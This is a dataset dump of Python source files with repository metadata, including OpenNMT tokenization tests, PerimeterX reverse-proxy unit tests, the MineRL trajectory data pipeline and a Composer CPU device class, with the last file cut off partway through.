hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
366122abcb50b723473f045b548942945acdfd8c
| 3,633
|
py
|
Python
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 1,363
|
2017-11-02T14:00:04.000Z
|
2022-03-25T15:21:50.000Z
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 455
|
2017-11-02T13:23:07.000Z
|
2022-03-23T08:45:30.000Z
|
opennmt/tests/text_test.py
|
gcervantes8/OpenNMT-tf
|
8cfe999c7b71f8d10caa6fe2af80cdf81d2b8c90
|
[
"MIT"
] | 429
|
2017-11-02T17:14:33.000Z
|
2022-02-26T12:00:39.000Z
|
import tensorflow as tf
from parameterized import parameterized
from opennmt.data import text
class TextTest(tf.test.TestCase):
def _testTokensToChars(self, tokens, expected_chars):
expected_chars = tf.nest.map_structure(tf.compat.as_bytes, expected_chars)
chars = text.tokens_to_chars(tf.constant(tokens, dtype=tf.string))
self.assertListEqual(chars.to_list(), expected_chars)
def testTokensToCharsEmpty(self):
self._testTokensToChars([], [])
def testTokensToCharsSingle(self):
self._testTokensToChars(["Hello"], [["H", "e", "l", "l", "o"]])
def testTokensToCharsMixed(self):
self._testTokensToChars(
["Just", "a", "测试"], [["J", "u", "s", "t"], ["a"], ["测", "试"]]
)
@parameterized.expand(
[
[["a■", "b", "c■", "d", "■e"], [["a■", "b"], ["c■", "d", "■e"]]],
[
["a", "■", "b", "c■", "d", "■", "e"],
[["a", "■", "b"], ["c■", "d", "■", "e"]],
],
]
)
def testToWordsWithJoiner(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens)
self.assertAllEqual(words.to_list(), expected)
@parameterized.expand(
[
[["▁a", "b", "▁c", "d", "e"], [["▁a", "b"], ["▁c", "d", "e"]]],
[
["▁", "a", "b", "▁", "c", "d", "e"],
[["▁", "a", "b"], ["▁", "c", "d", "e"]],
],
[["a▁", "b", "c▁", "d", "e"], [["a▁"], ["b", "c▁"], ["d", "e"]]],
[
["a", "▁b▁", "c", "d", "▁", "e"],
[["a"], ["▁b▁"], ["c", "d"], ["▁", "e"]],
],
]
)
def testToWordsWithSpacer(self, tokens, expected):
expected = tf.nest.map_structure(tf.compat.as_bytes, expected)
tokens = tf.constant(tokens)
words = text.tokens_to_words(tokens, subword_token="▁", is_spacer=True)
self.assertAllEqual(words.to_list(), expected)
def _testPharaohAlignments(self, line, lengths, expected_matrix):
matrix = text.alignment_matrix_from_pharaoh(
tf.constant(line), lengths[0], lengths[1], dtype=tf.int32
)
self.assertListEqual(expected_matrix, self.evaluate(matrix).tolist())
def testPharaohAlignments(self):
self._testPharaohAlignments("", [0, 0], [])
self._testPharaohAlignments("0-0", [1, 1], [[1]])
self._testPharaohAlignments(
"0-0 1-1 2-2 3-3",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]],
)
self._testPharaohAlignments(
"0-0 1-1 2-3 3-2",
[4, 4],
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]],
)
self._testPharaohAlignments("0-0 1-2 1-1", [2, 3], [[1, 0], [0, 1], [0, 1]])
self._testPharaohAlignments(
"0-0 1-2 1-1 2-4",
[3, 5],
[[1, 0, 0], [0, 1, 0], [0, 1, 0], [0, 0, 0], [0, 0, 1]],
)
@parameterized.expand([[True], [False]])
def testInvalidPharaohAlignments(self, run_as_function):
func = text.alignment_matrix_from_pharaoh
if run_as_function:
func = tf.function(func)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "source"):
func(tf.constant("0-0 1-1 2-3 3-2"), 2, 4)
with self.assertRaisesRegex(tf.errors.InvalidArgumentError, "target"):
func(tf.constant("0-0 1-2 1-1 2-4"), 3, 4)
if __name__ == "__main__":
tf.test.main()
| 36.33
| 84
| 0.496009
| 3,556
| 0.960302
| 0
| 0
| 1,853
| 0.500405
| 0
| 0
| 490
| 0.132325
|
3661e55cade9d0047ddb0c329454134c08c3a612
| 4,277
|
py
|
Python
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 1
|
2021-11-06T16:47:51.000Z
|
2021-11-06T16:47:51.000Z
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 1
|
2020-08-31T10:50:25.000Z
|
2020-08-31T10:50:25.000Z
|
test/test_px_proxy.py
|
wizzard/perimeterx-python-3-wsgi
|
03aded2c868dda3ad198c1f3ee944c775557d818
|
[
"MIT"
] | 4
|
2020-04-01T10:37:09.000Z
|
2020-12-03T12:34:13.000Z
|
import unittest
import requests_mock
from werkzeug.test import EnvironBuilder
from werkzeug.wrappers import Request
from perimeterx import px_constants
from perimeterx.px_config import PxConfig
from perimeterx.px_context import PxContext
from perimeterx.px_proxy import PxProxy
class Test_PXProxy(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.config = PxConfig({'app_id': 'PXfake_app_id'})
cls.headers = {'X-FORWARDED-FOR': '127.0.0.1',
'remote-addr': '127.0.0.1',
'content_length': '100'}
def test_should_reverse_request(self):
builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/init.js')
env = builder.get_environ()
request = Request(env)
context = PxContext(request, self.config)
px_proxy = PxProxy(self.config)
should_reverse = px_proxy.should_reverse_request(context.uri)
self.assertTrue(should_reverse)
should_reverse = px_proxy.should_reverse_request(context.uri)
self.assertTrue(should_reverse)
should_reverse = px_proxy.should_reverse_request(context.uri)
self.assertTrue(should_reverse)
@requests_mock.mock()
def test_send_reverse_client_request(self, mock):
content = 'client js content'
builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/init.js')
env = builder.get_environ()
request = Request(env)
context = PxContext(request, self.config)
headers = {'host': px_constants.CLIENT_HOST,
px_constants.FIRST_PARTY_HEADER: '1',
px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
mock.get(url='https://client.perimeterx.net/PXfake_app_id/main.min.js', text=content, request_headers=headers,
status_code=200, reason='OK')
px_proxy = PxProxy(self.config)
status, headers, body = px_proxy.send_reverse_client_request(config=self.config, ctx=context)
self.assertEqual(content, body.decode("utf-8"))
@requests_mock.mock()
def test_send_reverse_captcha_request(self, mock):
content = 'captcha js content'
builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/captcha/captcha.js', query_string='a=c&u=cfe74220-f484-11e8-9b14-d7280325a290&v=0701bb80-f482-11e8-8a31-a37cf9620569&m=0')
env = builder.get_environ()
request = Request(env)
context = PxContext(request, self.config)
headers = {'host': px_constants.CAPTCHA_HOST,
px_constants.FIRST_PARTY_HEADER: '1',
px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
mock.get(
url='https://captcha.px-cdn.net/PXfake_app_id/captcha.js?a=c&u=cfe74220-f484-11e8-9b14-d7280325a290&v=0701bb80-f482-11e8-8a31-a37cf9620569&m=0',
text=content, request_headers=headers, status_code=200, reason='OK')
px_proxy = PxProxy(self.config)
status, headers, body = px_proxy.send_reverse_captcha_request(config=self.config, ctx=context)
self.assertEqual(content, body.decode("utf-8"))
@requests_mock.mock()
def test_send_reverse_xhr_request(self, mock):
content = 'xhr content'
builder = EnvironBuilder(headers=self.headers, path='/fake_app_id/xhr/api/v1/collector', method='POST')
env = builder.get_environ()
request = Request(env)
context = PxContext(request, self.config)
headers = {'host': self.config.collector_host,
px_constants.FIRST_PARTY_HEADER: '1',
px_constants.ENFORCER_TRUE_IP_HEADER: context.ip,
px_constants.FIRST_PARTY_FORWARDED_FOR: '127.0.0.1'}
mock.post(url='https://collector-pxfake_app_id.perimeterx.net/api/v1/collector', text=content,
request_headers=headers, status_code=200, reason='OK')
px_proxy = PxProxy(self.config)
status, headers, body = px_proxy.send_reverse_xhr_request(config=self.config, ctx=context, body=content)
self.assertEqual(content, body.decode("utf-8"))
| 45.989247
| 208
| 0.676876
| 3,994
| 0.933832
| 0
| 0
| 3,314
| 0.774842
| 0
| 0
| 731
| 0.170914
|
36625b8ef7dfda999b8814af3148b3e2460eb4ae
| 1,683
|
py
|
Python
|
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
PI/Events/Event.py
|
HotShot0901/PI
|
7e6fd0f68b4222e09ea825f27709ec5b1e51e928
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"bzip2-1.0.6",
"BSD-3-Clause"
] | null | null | null |
# This just shifts 1 to i th BIT
def BIT(i: int) -> int:
return int(1 << i)
# This class is equvalent to a C++ enum
class EventType:
Null, \
WindowClose, WindowResize, WindowFocus, WindowMoved, \
AppTick, AppUpdate, AppRender, \
KeyPressed, KeyReleased, CharInput, \
MouseButtonPressed, MouseButtonReleased, MouseMoved, MouseScrolled \
= range(0, 15)
# This class is equvalent to a C++ enum
# It uses bitstream to represent flags, so
# a single Event can have multiple flags
class EventCategory:
Null = 0
Application = BIT(0)
Input = BIT(1)
Keyboard = BIT(2)
Mouse = BIT(3)
MouseButton = BIT(4)
class Event:
Handled = False
@property
def EventType(self) -> int:
pass
@property
def Name(self) -> str:
return type(self)
@property
def CategoryFlags(self) -> int:
pass
def ToString(self) -> str:
return self.GetName()
def IsInCategory(self, category: int) -> bool:
return bool(self.CategoryFlags & category)
def __repr__(self) -> str:
return self.ToString()
class EventDispatcher:
__slots__ = ("_Event",)
def __init__(self, event: Event) -> None:
self._Event = event
def Dispach(self, func, eventType: int) -> bool:
if (self._Event.EventType == eventType):
handeled = func(self._Event)
self._Event.Handled = handeled
return True
return False
| 26.714286
| 87
| 0.541889
| 1,430
| 0.849673
| 0
| 0
| 182
| 0.10814
| 0
| 0
| 200
| 0.118835
|
3662bd8e72712ef2032fb1273a5b29f2780ed323
| 144
|
py
|
Python
|
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
users.py
|
VinasRibeiro/DownStoriesInsta
|
56c8dc402b50a07db2b207c683e39e045fda83e1
|
[
"MIT"
] | null | null | null |
class Users:
usernamep = 'your_user_email'
passwordp = 'your_password'
linkp = 'https://www.instagram.com/stories/cznburak/'
| 18
| 57
| 0.666667
| 137
| 0.951389
| 0
| 0
| 0
| 0
| 0
| 0
| 77
| 0.534722
|
36639a81d680c26726142c2d1b64012956deef78
| 19,831
|
py
|
Python
|
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | 1
|
2021-06-10T04:03:24.000Z
|
2021-06-10T04:03:24.000Z
|
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | null | null | null |
src/minerl/data/data_pipeline.py
|
imatge-upc/pixelcoordEDL
|
353632feed6ac8c93758c1a2a1b7a477e7ff053c
|
[
"MIT"
] | null | null | null |
import collections
import functools
import json
import logging
import multiprocessing
import os
import time
from collections import OrderedDict
from queue import PriorityQueue, Empty
from typing import List, Tuple, Any
from itertools import cycle, islice
import minerl.herobraine.env_spec
from minerl.herobraine.hero import spaces
import cv2
import os
import numpy as np
import gym
logger = logging.getLogger(__name__)
from minerl.data.version import assert_version, assert_prefix
import copy
import tqdm
import queue
import minerl.data.util
from minerl.data.util import forever, minibatch_gen
import concurrent
from IPython import embed
if os.name != "nt":
class WindowsError(OSError):
pass
def tree_slice(tree, slc):
if isinstance(tree, OrderedDict):
return OrderedDict(
[(k, tree_slice(v, slc)) for k, v in tree.items()]
)
else:
return tree[slc]
class DataPipeline:
"""
Creates a data pipeline object used to itterate through the MineRL-v0 dataset
"""
def __init__(self,
data_directory: os.path,
environment: str,
num_workers: int,
worker_batch_size: int,
min_size_to_dequeue: int,
random_seed=42):
"""
Sets up a tensorflow dataset to load videos from a given data directory.
:param data_directory:
:type data_directory:
:param num_workers:
:type num_workers:
:param worker_batch_size:
:type worker_batch_size:
:param min_size_to_dequeue:
:type min_size_to_dequeue:
:param random_seed:
"""
self.seed = random_seed
self.data_dir = data_directory
self.environment = environment
self.number_of_workers = num_workers
self.worker_batch_size = worker_batch_size
self.size_to_dequeue = min_size_to_dequeue
self.processing_pool = multiprocessing.Pool(self.number_of_workers)
self._env_spec = gym.envs.registration.spec(self.environment)._kwargs['env_spec']
self._action_space = gym.envs.registration.spec(self.environment)._kwargs['action_space']
self._observation_space = gym.envs.registration.spec(self.environment)._kwargs['observation_space']
@property
def spec(self) -> minerl.herobraine.env_spec.EnvSpec:
return self._env_spec
@property
def action_space(self):
"""
Returns: action space of current MineRL environment
"""
return self._action_space
@property
def observation_space(self):
"""
Returns: action space of current MineRL environment
"""
return self._observation_space
# return result
def load_data(self, stream_name: str, skip_interval=0, include_metadata=False, video_name='recording.mp4'):
"""Iterates over an individual trajectory named stream_name.
Args:
stream_name (str): The stream name desired to be iterated through.
skip_interval (int, optional): How many sices should be skipped.. Defaults to 0.
include_metadata (bool, optional): Whether or not meta data about the loaded trajectory should be included.. Defaults to False.
Yields:
A tuple of (state, player_action, reward_from_action, next_state, is_next_state_terminal).
These are tuples are yielded in order of the episode.
"""
if '/' in stream_name:
file_dir = stream_name
else:
file_dir = os.path.join(self.data_dir, stream_name)
if DataPipeline._is_blacklisted(stream_name):
raise RuntimeError("This stream is corrupted (and will be removed in the next version of the data!)")
seq = DataPipeline._load_data_pyfunc(file_dir, -1, None, self.environment, skip_interval=skip_interval,
include_metadata=include_metadata, video_name=video_name)
if include_metadata:
observation_seq, action_seq, reward_seq, next_observation_seq, done_seq, meta = seq
else:
observation_seq, action_seq, reward_seq, next_observation_seq, done_seq = seq
# make a copty
gym_spec = gym.envs.registration.spec(self.environment)
target_space = copy.deepcopy(gym_spec._kwargs['observation_space'])
x = list(target_space.spaces.items())
target_space.spaces = collections.OrderedDict(
sorted(x, key=lambda x:
x[0] if x[0] is not 'pov' else 'z')
)
# Now we just need to slice the dict.
for idx in tqdm.tqdm(range(len(reward_seq))):
# Wrap in dict
action_dict = tree_slice(action_seq, idx)
observation_dict = tree_slice(observation_seq, idx)
next_observation_dict = tree_slice(next_observation_seq, idx)
yield_list = [observation_dict, action_dict, reward_seq[idx], next_observation_dict, done_seq[idx]]
yield yield_list + [meta] if include_metadata else yield_list
def get_trajectory_names(self):
"""Gets all the trajectory names
Returns:
A list of experiment names: [description]
"""
return [os.path.basename(x) for x in self._get_all_valid_recordings(self.data_dir)]
############################
# PRIVATE METHODS #
############################
@staticmethod
def read_frame(cap):
try:
ret, frame = cap.read()
if ret:
cv2.cvtColor(frame, code=cv2.COLOR_BGR2RGB, dst=frame)
frame = np.asarray(np.clip(frame, 0, 255), dtype=np.uint8)
return ret, frame
except Exception as err:
logger.error("error reading capture device:", err)
raise err
@staticmethod
def _roundrobin(*iterables):
"roundrobin('ABC', 'D', 'EF') --> A D E B F C"
# Recipe credited to George Sakkis
pending = len(iterables)
nexts = cycle(iter(it).next for it in iterables)
while pending:
try:
for next in nexts:
yield next()
except StopIteration:
pending -= 1
nexts = cycle(islice(nexts, pending))
# Todo: Make data pipeline split files per push.
@staticmethod
def _load_data_pyfunc(file_dir: str, max_seq_len: int, data_queue, env_str="", skip_interval=0,
include_metadata=False, video_name='recording.mp4'):
"""
Enqueueing mechanism for loading a trajectory from a file onto the data_queue
:param file_dir: file path to data directory
:param skip_interval: Number of time steps to skip between each sample
:param max_seq_len: Number of time steps in each enqueued batch
:param data_queue: multiprocessing data queue, or None to return streams directly
:param include_metadata: whether or not to return an additional tuple containing metadata
:return:
"""
logger.debug("Loading from file {}".format(file_dir))
video_path = str(os.path.join(file_dir, video_name))
numpy_path = str(os.path.join(file_dir, 'rendered.npz'))
meta_path = str(os.path.join(file_dir, 'metadata.json'))
try:
# Start video decompression
cap = cv2.VideoCapture(video_path)
# Load numpy file
state = np.load(numpy_path, allow_pickle=True)
# Load metadata file
with open(meta_path) as file:
meta = json.load(file)
if 'stream_name' not in meta:
meta['stream_name'] = file_dir
action_dict = collections.OrderedDict([(key, state[key]) for key in state if key.startswith('action$')])
reward_vec = state['reward']
info_dict = collections.OrderedDict([(key, state[key]) for key in state if key.startswith('observation$')])
# Recursively sorts nested dicts
def recursive_sort(dct):
for key in list(dct.keys()):
if isinstance(dct[key], OrderedDict):
dct[key] = recursive_sort(dct[key])
dct[key] = OrderedDict(sorted(dct[key].items()))
return dct
def unflatten(dct, sep='$'):
out_dict = OrderedDict({})
for k, v in dct.items():
keys = k.split(sep)
cur_dict = out_dict
for key in keys[:-1]:
if key not in cur_dict:
cur_dict[key] = OrderedDict({})
cur_dict = cur_dict[key]
cur_dict[keys[-1]] = v
# Sort dict recursively
recursive_sort(out_dict)
return out_dict
# There is no action or reward for the terminal state of an episode.
# Hence in Publish.py we shorten the action and reward vector to reflect this.
# We know FOR SURE that the last video frame corresponds to the last state (from Universal.json).
num_states = len(reward_vec) + 1
max_frame_num = meta['true_video_frame_count']
frames = []
frame_num, stop_idx = 0, 0
# Advance video capture past first i-frame to start of experiment
cap = cv2.VideoCapture(video_path)
# for _ in range(max_frame_num - num_states):
# ret, _ = DataPipeline.read_frame(cap)
# frame_num += 1
# if not ret:
# raise RuntimeError()
# Rendered Frames
# Loop through the video and construct frames
# of observations to be sent via the multiprocessing queue
# in chunks of worker_batch_size to the batch_iter loop.
while True:
ret = True
start_idx = stop_idx
# Collect up to worker_batch_size number of frames
try:
# Go until max_seq_len +1 for S_t, A_t, -> R_t, S_{t+1}, D_{t+1}
while ret and frame_num < max_frame_num and (len(frames) < max_seq_len + 1 or max_seq_len == -1):
ret, frame = DataPipeline.read_frame(cap)
frames.append(frame)
frame_num += 1
except Exception as err:
logger.error("error reading capture device:", err)
raise err
if len(frames) <= 1:
break
if frame_num == max_frame_num:
frames[-1] = frames[-2]
# Next sarsd pair index
stop_idx = start_idx + len(frames) - 1
# print('Num frames in batch:', stop_idx - start_idx)
# Load non-image data from npz
current_observation_data = OrderedDict()
action_data = OrderedDict()
next_observation_data = OrderedDict()
try:
for key in list(info_dict.keys()) + ['observation$pov']:
if 'pov' in key:
current_observation_data[key] = np.asanyarray(frames[:-1])
next_observation_data[key] = np.asanyarray(frames[1:])
else:
current_observation_data[key] = np.asanyarray(info_dict[key][start_idx:stop_idx])
next_observation_data[key] = np.asanyarray(info_dict[key][start_idx + 1:stop_idx + 1])
# We are getting (S_t, A_t -> R_t), S_{t+1}, D_{t+1} so there are less actions and rewards
for key in action_dict:
action_data[key] = np.asanyarray(action_dict[key][start_idx: stop_idx])
reward_data = np.asanyarray(reward_vec[start_idx:stop_idx], dtype=np.float32)
done_data = [False for _ in range(len(reward_data))]
if frame_num == max_frame_num:
done_data[-1] = True
except Exception as err:
logger.error("error drawing batch from npz file:", err)
raise err
# unflatten these dictioanries.
current_observation_data = unflatten(current_observation_data)['observation']
action_data = unflatten(action_data)['action']
next_observation_data = unflatten(next_observation_data)['observation']
batches = [current_observation_data, action_data, reward_data, next_observation_data,
np.array(done_data, dtype=np.bool)]
if include_metadata:
batches += [meta]
if data_queue is None:
return batches
else:
data_queue.put(batches)
logger.debug("Enqueued from file {}".format(file_dir))
if not ret:
break
else:
frames = [frames[-1]]
logger.error("Finished")
return None
except WindowsError as e:
logger.debug("Caught windows error {} - this is expected when closing the data pool".format(e))
return None
except FileNotFoundError as e:
print("File not found!")
raise e
except Exception as e:
logger.error("Exception caught on file \"{}\" by a worker of the data pipeline.".format(file_dir))
logger.error(repr(e))
return None
def batch_iter(self,
batch_size: int,
seq_len: int,
num_epochs: int = -1,
preload_buffer_size: int = 2,
seed: int = None,
include_metadata: bool = False):
"""Returns batches of sequences length SEQ_LEN of the data of size BATCH_SIZE.
The iterator produces batches sequentially. If an element of a batch reaches the
end of its
Args:
batch_size (int): The batch size.
seq_len (int): The size of sequences to produce.
num_epochs (int, optional): The number of epochs to iterate over the data. Defaults to -1.
preload_buffer_size (int, optional): Increase to IMPROVE PERFORMANCE. The data iterator uses a queue to prevent blocking, the queue size is the number of trajectories to load into the buffer. Adjust based on memory constraints. Defaults to 32.
seed (int, optional): [int]. NOT IMPLEMENTED Defaults to None.
include_metadata (bool, optional): Include metadata on the source trajectory. Defaults to False.
Returns:
Generator: A generator that yields (sarsd) batches
"""
# Todo: Not implemented/
for epoch in (range(num_epochs) if num_epochs > 0 else forever()):
trajectory_queue = queue.Queue(maxsize=preload_buffer_size)
def traj_iter():
for _ in jobs:
s, a, r, sp1, d = trajectory_queue.get()
yield dict(
obs=s,
act=a,
reward=r,
next_obs=sp1,
done=d
)
jobs = [(f, -1, None) for f in self._get_all_valid_recordings(self.data_dir)]
np.random.shuffle(jobs)
trajectory_loader = minerl.data.util.OrderedJobStreamer(
job,
jobs,
trajectory_queue,
# executor=concurrent.futures.ThreadPoolExecutor,
max_workers=preload_buffer_size
)
trajectory_loader.start()
for seg_batch in minibatch_gen(traj_iter(), batch_size=batch_size, nsteps=seq_len):
yield seg_batch['obs'], seg_batch['act'], seg_batch['reward'], seg_batch['next_obs'], seg_batch['done']
trajectory_loader.shutdown()
@staticmethod
def _is_blacklisted(path):
for p in [
'tempting_capers_shapeshifter-14'
]:
if p in path:
return True
return False
@staticmethod
def _get_all_valid_recordings(path):
directoryList = []
# return nothing if path is a file
if os.path.isfile(path):
return []
# Skip this file.
if DataPipeline._is_blacklisted(path):
return []
# add dir to directory list if it contains .txt files
if len([f for f in os.listdir(path) if f.endswith('.mp4')]) > 0:
if len([f for f in os.listdir(path) if f.endswith('.npz')]) > 0:
assert_prefix(path)
directoryList.append(path)
for d in os.listdir(path):
new_path = os.path.join(path, d)
if os.path.isdir(new_path):
directoryList += DataPipeline._get_all_valid_recordings(new_path)
directoryList = np.array(directoryList)
np.random.shuffle(directoryList)
return directoryList.tolist()
###
# DEPRECATED API
###
def seq_iter(self, num_epochs=-1, max_sequence_len=32, queue_size=None, seed=None, include_metadata=False):
"""DEPRECATED METHOD FOR SAMPLING DATA FROM THE MINERL DATASET.
This function is now :code:`DataPipeline.batch_iter()`
"""
raise DeprecationWarning(
"The `DataPipeline.seq_iter` method is deprecated! Please use DataPipeline.batch_iter()."
"\nNOTE: The new method `DataPipeline.batch_iter` has a different return signature! "
"\n\t Please see how to use it @ http://www.minerl.io/docs/tutorials/data_sampling.html")
def sarsd_iter(self, num_epochs=-1, max_sequence_len=32, queue_size=None, seed=None, include_metadata=False):
"""
Returns a generator for iterating through (state, action, reward, next_state, is_terminal)
tuples in the dataset.
Loads num_workers files at once as defined in minerl.data.make() and return up to
max_sequence_len consecutive samples wrapped in a dict observation space
Args:
num_epochs (int, optional): number of epochs to iterate over or -1
to loop forever. Defaults to -1
max_sequence_len (int, optional): maximum number of consecutive samples - may be less. Defaults to 32
seed (int, optional): seed for random directory walk - note, specifying seed as well as a finite num_epochs
will cause the ordering of examples to be the same after every call to seq_iter
queue_size (int, optional): maximum number of elements to buffer at a time, each worker may hold an
additional item while waiting to enqueue. Defaults to 16*self.number_of_workers or 2*
self.number_of_workers if max_sequence_len == -1
include_metadata (bool, optional): adds an additional member to the tuple containing metadata about the
stream the data was loaded from. Defaults to False
Yields:
A tuple of (state, player_action, reward_from_action, next_state, is_next_state_terminal, (metadata)).
Each element is in the format of the environment action/state/reward space and contains as many
samples are requested.
"""
raise DeprecationWarning(
"The `DataPipeline.sarsd_iter` method is deprecated! Please use DataPipeline.batch_iter().")
def job(arg):
return DataPipeline._load_data_pyfunc(*arg)
| 40.554192
| 255
| 0.590742
| 18,892
| 0.95265
| 5,207
| 0.262569
| 9,807
| 0.494529
| 0
| 0
| 7,134
| 0.35974
|
3665bd678eff29512019ffaccbebf303e9c263a9
| 1,461
|
py
|
Python
|
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/devices/device_cpu.py
|
IanWorley/composer
|
e4d443012511b387ad495b4add3b3b101d729741
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 MosaicML. All Rights Reserved.
"""The CPU device used for training."""
from __future__ import annotations
import logging
from contextlib import contextmanager
from typing import Any, Dict, Generator, TypeVar, Union
import torch
from composer.core import Precision
from composer.trainer.devices.device import Device, T_nnModule
logger = logging.getLogger(__name__)
__all__ = ["DeviceCPU"]
T_nnModule = TypeVar("T_nnModule", bound=torch.nn.Module)
class DeviceCPU(Device):
"""An extension of :class:`~composer.trainer.devices.device.Device` for CPUs.
This class takes no arguments.
"""
dist_backend = "gloo"
_device = torch.device('cpu')
def module_to_device(self, module: T_nnModule) -> T_nnModule:
return module.to(self._device)
def tensor_to_device(self, tensor: torch.Tensor) -> torch.Tensor:
return tensor.to(self._device)
@contextmanager
def precision_context(self, precision: Union[str, Precision]) -> Generator[None, None, None]:
precision = Precision(precision)
if precision == Precision.FP32:
yield
else:
raise ValueError(f"Precision {precision} not supported for a CPU")
def state_dict(self) -> Dict[str, Any]:
# CPU device has no RNG state
return {}
def load_state_dict(self, state: Dict[str, Any]) -> None:
if len(state) != 0:
raise ValueError("CPU device has no state.")
| 27.566038
| 97
| 0.687201
| 987
| 0.675565
| 285
| 0.195072
| 305
| 0.208761
| 0
| 0
| 344
| 0.235455
|
3666bf1e611ab935978f475b3bd8eb1fa7fa44ff
| 4,208
|
py
|
Python
|
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | 5
|
2022-01-12T06:36:56.000Z
|
2022-03-15T06:56:03.000Z
|
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | null | null | null |
experiments/generate-pdf/process_hypercluster_data.py
|
parasailteam/coconet
|
d3a7d22697686586d01ca8f55f40fd2cc8b755c1
|
[
"MIT"
] | 1
|
2022-03-13T05:43:50.000Z
|
2022-03-13T05:43:50.000Z
|
import os
import re
import json
import ast
import csv
import sys
import shutil
# ["allreduce-lambf16", "reducescatter-lamb-allgatherf16", "test-lambf16"] + \
# ["allreduce-adamf16", "reducescatter-adam-allgatherf16", "test-adamf16"] +\
all_binaries = ["adam-ar-c", "adam-rs-c-ag", "adam-fuse-rs-c-ag"] + \
["lamb-ar-c", "lamb-rs-c-ag", "lamb-fuse-rs-c-ag"] + \
["python3 optimbench.py --optimizer FusedLAMB --fp16", "python3 optimbench.py --optimizer FusedLAMB", "python3 optimbench.py --optimizer FusedAdam --fp16", "python3 optimbench.py --optimizer FusedAdam"] + \
["multi-process-adam-scattered lamb", "multi-process-adam-scattered adam", "multi-process-adam-scatteredf16 adam", "multi-process-adam-scatteredf16 lamb"]
all_gpus = [2**i for i in range(1, 9)]
all_channels = [2,16,32,64,80]
